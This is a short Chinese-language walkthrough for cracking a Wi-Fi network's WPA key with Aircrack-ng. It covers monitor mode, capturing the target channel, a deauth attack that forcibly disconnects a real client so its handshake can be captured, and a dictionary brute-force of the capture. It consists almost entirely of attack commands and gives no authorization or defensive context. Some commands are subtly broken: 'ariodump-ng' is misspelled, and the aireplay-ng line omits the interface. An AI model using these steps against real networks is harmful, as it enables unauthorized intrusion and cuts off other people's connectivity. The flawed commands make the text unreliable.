Aircrack-ng 
使网卡进入监听模式 
查看当前无线网卡标识
sh
ip a激活网卡
sh
airmon-ng start wlan0激活后再次查看网卡标识,会发现名称后面多了个mon
寻找目标AP 
使用airodump-ng抓包
sh
airodump-ng wlan0mon条件
- 有用户已经连上了目标AP。
 - 目标的信号足够稳定
 
需要记住的目标AP相关信息:
- BSSID
 - MAC地址
 - 频道
 
监听目标频道 
假设频道是11,将监听记录写入ch11开头的文件中
实际生成的文件名形如 ch11-01.cap
sh
ariodump-ng -c 11 -w ch11 wlan0mon等待握手包 
当有设备尝试连接目标AP时,airodump-ng就能捕获其握手数据报文。
可以通过 deauth 攻击迫使其他设备重新连接。
首先找一个连上了 airodump-ng 的较活跃的客户端,记住其MAC地址。用aireplay-ng命令伪装成该地址向AP发起攻击。
sh
AP=目标AP的MAC地址
CLIENT=伪装成的客户端MAC地址
aireplay-ng -0 2 -a $AP -c $CLIENT发起攻击后,那个真正的客户端会断网,可能会立即尝试重新连接,于是就可以捕获到握手数据报文了。
暴力破解 
首先需要拥有字典。
INFO
可以使用Crunch工具生成字典。
sh
aircrack-ng -w dict.txt ch11-01.cap